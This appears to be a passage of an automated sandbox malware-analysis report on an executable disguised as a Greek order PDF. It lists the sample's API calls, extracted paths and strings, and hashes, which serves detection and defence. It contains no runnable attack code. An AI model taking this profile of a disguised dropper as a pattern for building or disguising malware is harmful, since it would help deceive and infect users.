Instruction Fuzzy Hash: A2B09235184A00AFDA114B10DE09F457A62E7A4701F008028B240240F0CAB200A5EB09

Function 004057B6 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExA.SHELL32(?,00401F5C,?), ref: 004057C5

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29

Function 0040417A Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F56), ref: 00404184

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 597d59fe883301d0b5c6155ff6ef4d2bcc35d12bd0c13962cde650b33604b6df
Instruction ID: da82fd3536d89c96f0dffd23ebfb530c9c189a59b1cea2a2009ac9f088f6e34b
Opcode Fuzzy Hash: 597d59fe883301d0b5c6155ff6ef4d2bcc35d12bd0c13962cde650b33604b6df
Instruction Fuzzy Hash: E4A00176444A40AFCA02AF50EF09D0ABB62ABA4701B12897AE295900348B765872EB19

Function 00401F7B Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004051FB: lstrlenA.KERNEL32(subterritories,00000000,00799A22,74DF23A0,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
Part of subcall function 004051FB: lstrlenA.KERNEL32(00403210,subterritories,00000000,00799A22,74DF23A0,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
Part of subcall function 004051FB: lstrcatA.KERNEL32(subterritories,00403210,00403210,subterritories,00000000,00799A22,74DF23A0), ref: 00405257
Part of subcall function 004051FB: SetWindowTextA.USER32(subterritories,subterritories), ref: 00405269
Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7

Part of subcall function 00405773: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D70,Error launching installer), ref: 0040579C
Part of subcall function 00405773: CloseHandle.KERNEL32(?), ref: 004057A9

CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401FC0

Part of subcall function 00406552: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F76,?,?,?,?,?,?), ref: 00406563
Part of subcall function 00406552: GetExitCodeProcess.KERNEL32(?,?), ref: 00406585

Part of subcall function 00406032: wsprintfA.USER32 ref: 0040603F

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: b5715756e82aacef9dba35480b317cef67fa4a28b9ebd8b0c2191e4f0fbd53e2
Instruction ID: 38ff014a8e4085178bb50f003d2faa90d0cc15d8516b8928bc727fcbc0eca729
Opcode Fuzzy Hash: b5715756e82aacef9dba35480b317cef67fa4a28b9ebd8b0c2191e4f0fbd53e2
Instruction Fuzzy Hash: 20F0B432905021EBCB20BFA59D84AEFB2A5DF01319B24463FF102B61D1CB7C4E425A6E

Function 0040380D Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403644,?,?,00000007,00000009,0000000B), ref: 00403818

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 203254b4b952498bcfb426d07e946647441d2fe85a9017f9f34946e1d1af236a
Instruction ID: 70899941626206ae6593ea46f51f68263bc92dff29c150bed4396ff8d4ee1535
Opcode Fuzzy Hash: 203254b4b952498bcfb426d07e946647441d2fe85a9017f9f34946e1d1af236a
Instruction Fuzzy Hash: 12C0123154070496C120BF749D4F5193B94AB45335B94877DB0F5B00F0CB7C4A6A465A

Non-executed Functions

Function 004045EA Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404639
SetWindowTextA.USER32(00000000,?), ref: 00404663
SHBrowseForFolderA.SHELL32(?,0079E940,?), ref: 00404714
CoTaskMemFree.OLE32(00000000), ref: 0040471F
lstrcmpiA.KERNEL32(: Completed,0079F568), ref: 00404751
lstrcatA.KERNEL32(?,: Completed), ref: 0040475D
SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040476F

Part of subcall function 004057D4: GetDlgItemTextA.USER32(?,?,00000400,004047A6), ref: 004057E7

Part of subcall function 004063AF: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406407
Part of subcall function 004063AF: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406414
Part of subcall function 004063AF: CharNextA.USER32(?,"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406419
Part of subcall function 004063AF: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406429

GetDiskFreeSpaceA.KERNEL32(0079E538,?,?,0000040F,?,0079E538,0079E538,?,00000001,0079E538,?,?,000003FB,?), ref: 0040482D
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404848

Part of subcall function 004049A1: lstrlenA.KERNEL32(0079F568,0079F568,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048BC,000000DF,00000000,00000400,?), ref: 00404A3F
Part of subcall function 004049A1: wsprintfA.USER32 ref: 00404A47
Part of subcall function 004049A1: SetDlgItemTextA.USER32(?,0079F568), ref: 00404A5A

Strings

8y, xrefs: 004047B7
C:\Users\user\AppData\Roaming\skittaget\lektier, xrefs: 0040473A
Clona $, xrefs: 00404603
: Completed, xrefs: 0040474B, 00404750, 0040475B
A, xrefs: 0040470D

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: Clona $$8y$: Completed$A$C:\Users\user\AppData\Roaming\skittaget\lektier
API String ID: 2624150263-2665192967
Opcode ID: a4aefe8a33941754a38210bdfdb67fad9402d671bf1433dcbf252a6a4ee896ac
Instruction ID: 0969ed353920fe7c0c653b0854d10b45f8508fdea16f9d8b9f06e94c3a270cc6
Opcode Fuzzy Hash: a4aefe8a33941754a38210bdfdb67fad9402d671bf1433dcbf252a6a4ee896ac
Instruction Fuzzy Hash: 80A17FB1900208ABDB11EFA5CD85AAF77B8EF85314F14843BF701B62D1D77C8A518B69

Function 0040589C Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058C5
lstrcatA.KERNEL32(007A0570,\*.*,007A0570,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040590D
lstrcatA.KERNEL32(?,0040A014,?,007A0570,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040592E
lstrlenA.KERNEL32(?,?,0040A014,?,007A0570,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405934
FindFirstFileA.KERNEL32(007A0570,?,?,?,0040A014,?,007A0570,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405945
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059F2
FindClose.KERNEL32(00000000), ref: 00405A03

Strings

"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe", xrefs: 0040589C
\*.*, xrefs: 00405907
C:\Users\user\AppData\Local\Temp\, xrefs: 004058A9

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-866183248
Opcode ID: 9393b2adcb6d8846d5ff8c884456c1fb2c6b7946f01c0648e6f841e18f88bca0
Instruction ID: ff286dc4e0ddd5c67b21a0dc49aadedac0e09a5b28e8edd6ac2018649726c89b
Opcode Fuzzy Hash: 9393b2adcb6d8846d5ff8c884456c1fb2c6b7946f01c0648e6f841e18f88bca0
Instruction Fuzzy Hash: 9C51B071900A04AADF21AB65CC86BBF7B68DF46724F14823BF441B51D2C73C4A82DF69

Function 0040216B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00408418,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2

Strings

C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111, xrefs: 00402230

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111
API String ID: 123533781-619757925
Opcode ID: cc6f848e1b62abadab8e006f4452da0e78099bc8968069d3cce75adc38b3ee25
Instruction ID: 66478de832771c1020eecb70c9dea3013e0956f30c68bb444eb5f27a96bb8e2b
Opcode Fuzzy Hash: cc6f848e1b62abadab8e006f4452da0e78099bc8968069d3cce75adc38b3ee25
Instruction Fuzzy Hash: DC511671A00208AFCB00DFE4C988E9D7BB6FF48314F2041BAF515EB2D1DA799981CB14

Function 004027A1 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 7f756400988a11a576d96bcb330f7db73c3d2f4761ae35ba5f018229d3e87ddf
Instruction ID: 501d16c749f80da14ed264ffe4d7962c3458ff385ba500142fb475b890c78c7d
Opcode Fuzzy Hash: 7f756400988a11a576d96bcb330f7db73c3d2f4761ae35ba5f018229d3e87ddf
Instruction Fuzzy Hash: E5F0A771644110DED700EB649A49AEE77689F51314F20457BF102B20C1D6B84A46972A

Function 00404B5D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B74
GetDlgItem.USER32(?,00000408), ref: 00404B81
GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404BD0
LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404BE7
SetWindowLongA.USER32(?,000000FC,0040516F), ref: 00404C01
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C13
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C27
SendMessageA.USER32(?,00001109,00000002), ref: 00404C3D
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C49
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C59
DeleteObject.GDI32(00000110), ref: 00404C5E
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404C89
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404C95
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D2F
SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D5F

Part of subcall function 0040418D: SendMessageA.USER32(00000028,?,00000001,00403FBD), ref: 0040419B

SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D73
GetWindowLongA.USER32(?,000000F0), ref: 00404DA1
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DAF
ShowWindow.USER32(?,00000005), ref: 00404DBF
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EBA
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F1F
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F34
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F58
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F78
ImageList_Destroy.COMCTL32(?), ref: 00404F8D
GlobalFree.KERNEL32(?), ref: 00404F9D
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405016
SendMessageA.USER32(?,00001102,?,?), ref: 004050BF
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050CE
InvalidateRect.USER32(?,00000000,00000001), ref: 004050F8
ShowWindow.USER32(?,00000000), ref: 00405146
GetDlgItem.USER32(?,000003FE), ref: 00405151
ShowWindow.USER32(00000000), ref: 00405158

Strings

M, xrefs: 00404D17
, xrefs: 00405130
N, xrefs: 00404DF8

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 90a3f73bba2d9c8e7cacb4b794b53442a440f171c96f1b4cbc8b508420429673
Instruction ID: 01e3f0ac69fe039d53c66122a0ee2819e5ae0f579c243cd3ce02c20529578500
Opcode Fuzzy Hash: 90a3f73bba2d9c8e7cacb4b794b53442a440f171c96f1b4cbc8b508420429673
Instruction Fuzzy Hash: AC025BB0900209AFDB10DFA8DD45AAE7BB5FB84354F10813AF610BA2E1D7799D52CF58

Function 004042C3 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040434E
GetDlgItem.USER32(00000000,000003E8), ref: 00404362
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404380
GetSysColor.USER32(?), ref: 00404391
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043A0
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043AF
lstrlenA.KERNEL32(?), ref: 004043B2
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043C1
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043D6
GetDlgItem.USER32(?,0000040A), ref: 00404438
SendMessageA.USER32(00000000), ref: 0040443B
GetDlgItem.USER32(?,000003E8), ref: 00404466
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044A6
LoadCursorA.USER32(00000000,00007F02), ref: 004044B5
SetCursor.USER32(00000000), ref: 004044BE
LoadCursorA.USER32(00000000,00007F00), ref: 004044D4
SetCursor.USER32(00000000), ref: 004044D7
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404503
SendMessageA.USER32(00000010,00000000,00000000), ref: 00404517

Strings

N, xrefs: 00404454
: Completed, xrefs: 00404491

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
